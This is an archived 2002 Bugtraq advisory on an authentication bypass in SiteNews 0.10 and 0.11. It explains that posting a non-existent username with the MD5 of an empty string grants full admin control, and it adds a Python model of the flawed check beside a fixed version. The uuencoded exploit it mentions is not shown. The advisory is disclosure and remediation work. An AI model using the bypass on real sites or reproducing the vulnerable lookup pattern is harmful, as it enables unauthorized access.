Bugtraq mailing list archives

SiteNews remote add user exploit


From: Ulf Härnhammar <ulfh () update uu se>
Date: Sat, 16 Feb 2002 18:46:35 +0100 (CET)

PROGRAM: SiteNews
AUTHOR: JP Durman (jp () pgw nl)
HOMEPAGE: http://www.linuxnetwork.nl/
VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well)
TYPE: remote add user exploit
SEVERITY: high

DESCRIPTION:

SiteNews is an open-source system for displaying and managing news items on
websites. According to its homepage, it has been downloaded almost 4000 times.

ISSUE:

The function GetPassword in function.php returns an empty string when asked
for a non-existent username. Because the program sends usernames in cleartext
and passwords as MD5 sums, this means that you can log in without an account
by posting a non-existent username and the MD5 sum of an empty string as the
password. SiteNews has no concept of user levels, so once you are in, you have
full control over all news items and all users.
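Added example (not code from SiteNews or from the advisory author): the Python
below models the check described above, where a lookup that yields "" for an
unknown user is MD5-hashed and compared with the posted hash, and puts a
corrected lookup beside it. The user table, function names and the stored
cleartext password are constructed stand-ins.

```python
import hashlib
import hmac
from typing import Optional

# Constructed stand-in for the SiteNews user store (username -> cleartext
# password). Sample account only; not from the original advisory.
USERS = {
    "editor": "correct horse",
}


def md5_hex(s: str) -> str:
    """Hex MD5 of a string, as the client-side login form would send it."""
    return hashlib.md5(s.encode()).hexdigest()


def get_password_vulnerable(username: str) -> str:
    """Models the behaviour the advisory describes: unknown user yields ''."""
    return USERS.get(username, "")


def login_vulnerable(username: str, posted_md5: str) -> bool:
    """Hypothetical login check: hashes whatever the lookup returned and
    compares it with the posted MD5. For an unknown user the lookup gives
    '' and md5('') is d41d8cd98f00b204e9800998ecf8427e, so posting that
    value with any non-existent username passes."""
    return md5_hex(get_password_vulnerable(username)) == posted_md5


def get_password_fixed(username: str) -> Optional[str]:
    """Corrected lookup: None (not '') when the account does not exist."""
    return USERS.get(username)


def login_fixed(username: str, posted_md5: str) -> bool:
    """Corrected check: reject unknown users before hashing anything, and
    compare the hashes in constant time."""
    stored = get_password_fixed(username)
    if stored is None:
        return False
    return hmac.compare_digest(md5_hex(stored), posted_md5)
```

The same fix applies to any lookup whose "not found" value is also a valid
credential value; the check must distinguish "no such user" from a user whose
secret happens to be empty.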

The author was contacted with an explanation, an exploit and a patch on the
5th of February. Version 0.12, which is not vulnerable, was released on the
7th of February.

RECOMMENDATION:

I recommend that all users upgrade to version 0.12 immediately.

EXPLOIT:

Here is my HTML exploit for this issue. It is uuencoded. You type in a non-
existent username and the user and password combination that you wish to add
to the system, and the exploit creates the new user for you, despite the fact
that you are not authorized.

// Ulf Harnhammar
metaur () prontomail com


